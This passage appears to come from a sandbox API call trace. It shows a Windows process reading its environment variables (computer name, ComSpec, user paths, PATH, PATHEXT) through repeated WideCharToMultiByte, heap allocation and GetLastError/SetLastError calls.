cchWideChar=-1, lpMultiByteStr=0x2e10b0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 24 [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1050) returned 0x18 [0173.475] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1050, Size=0x1c) returned 0x2e10d0 [0173.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0173.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2db050 [0173.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x2db050, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.475] SetLastError (dwErrCode=0x0) [0173.475] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e10d0) returned 0x1c [0173.476] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e10d0, Size=0x20) returned 0x2e10d0 [0173.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0173.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x14) returned 0x2e1050 [0173.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x2e1050, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.476] GetLastError () returned 0x0 [0173.476] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e10d0) returned 0x20 [0173.477] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e10d0, Size=0x24) returned 0x2e10d0 [0173.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0173.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd) returned 0x2d3288 [0173.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x2d3288, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.477] SetLastError (dwErrCode=0x0) [0173.477] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.478] GetLastError () returned 0x0 [0173.478] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e10d0) returned 0x24 [0173.479] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e10d0, Size=0x28) returned 0x2e10d0 [0173.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0173.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1a) returned 0x2dee00 [0173.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x2dee00, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 26 [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.479] SetLastError (dwErrCode=0x0) [0173.479] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e10d0) returned 0x28 [0173.480] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e10d0, Size=0x2c) returned 0x2e10d0 [0173.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0173.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db728 [0173.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x2db728, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local", lpUsedDefaultChar=0x0) returned 46 [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.480] SetLastError (dwErrCode=0x0) [0173.480] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.481] SetLastError (dwErrCode=0x0) [0173.481] GetLastError () returned 0x0 [0173.482] SetLastError (dwErrCode=0x0) [0173.482] GetLastError () returned 0x0 [0173.482] SetLastError (dwErrCode=0x0) [0173.482] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e10d0) returned 0x2c [0173.482] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e10d0, Size=0x30) returned 0x2e10d0 [0173.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0173.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x19) returned 0x2dee28 [0173.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x2dee28, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 25 [0173.482] GetLastError () returned 0x0 [0173.482] SetLastError (dwErrCode=0x0) [0173.482] GetLastError () returned 0x0 [0173.482] SetLastError (dwErrCode=0x0) [0173.482] GetLastError () returned 0x0 [0173.482] SetLastError (dwErrCode=0x0) [0173.482] GetLastError () returned 0x0 [0173.482] SetLastError (dwErrCode=0x0) [0173.482] GetLastError () returned 0x0 [0173.482] SetLastError (dwErrCode=0x0) [0173.482] GetLastError () returned 0x0 [0173.482] SetLastError (dwErrCode=0x0) [0173.482] GetLastError () returned 0x0 [0173.482] SetLastError (dwErrCode=0x0) [0173.482] GetLastError () returned 0x0 [0173.482] SetLastError (dwErrCode=0x0) [0173.482] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.483] SetLastError (dwErrCode=0x0) [0173.483] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e10d0) returned 0x30 [0173.484] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e10d0, Size=0x34) returned 0x2e10d0 [0173.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0173.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e1110 [0173.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x2e1110, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.484] SetLastError (dwErrCode=0x0) [0173.484] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] GetLastError () returned 0x0 [0173.485] SetLastError (dwErrCode=0x0) [0173.485] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e10d0) returned 0x34 [0173.485] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e10d0, Size=0x38) returned 0x2e10d0 [0173.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0173.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe) returned 0x2d32a0 [0173.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x2d32a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.486] SetLastError (dwErrCode=0x0) [0173.486] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e10d0) returned 0x38 [0173.487] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e10d0, Size=0x3c) returned 0x2e1130 [0173.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 149 [0173.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x95) returned 0x2e1178 [0173.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x2e1178, cbMultiByte=149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 149 [0173.487] GetLastError () returned 0x0 [0173.487] SetLastError (dwErrCode=0x0) [0173.487] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.488] SetLastError (dwErrCode=0x0) [0173.488] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] GetLastError () returned 0x0 [0173.489] SetLastError (dwErrCode=0x0) [0173.489] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1130) returned 0x3c [0173.489] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1130, Size=0x40) returned 0x2e1130 [0173.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0173.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3e) returned 0x2d2618 [0173.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x2d2618, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0173.489] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.490] SetLastError (dwErrCode=0x0) [0173.490] GetLastError () returned 0x0 [0173.491] SetLastError (dwErrCode=0x0) [0173.491] GetLastError () returned 0x0 [0173.491] SetLastError (dwErrCode=0x0) [0173.491] GetLastError () returned 0x0 [0173.491] SetLastError (dwErrCode=0x0) [0173.491] GetLastError () returned 0x0 [0173.491] SetLastError (dwErrCode=0x0) [0173.491] 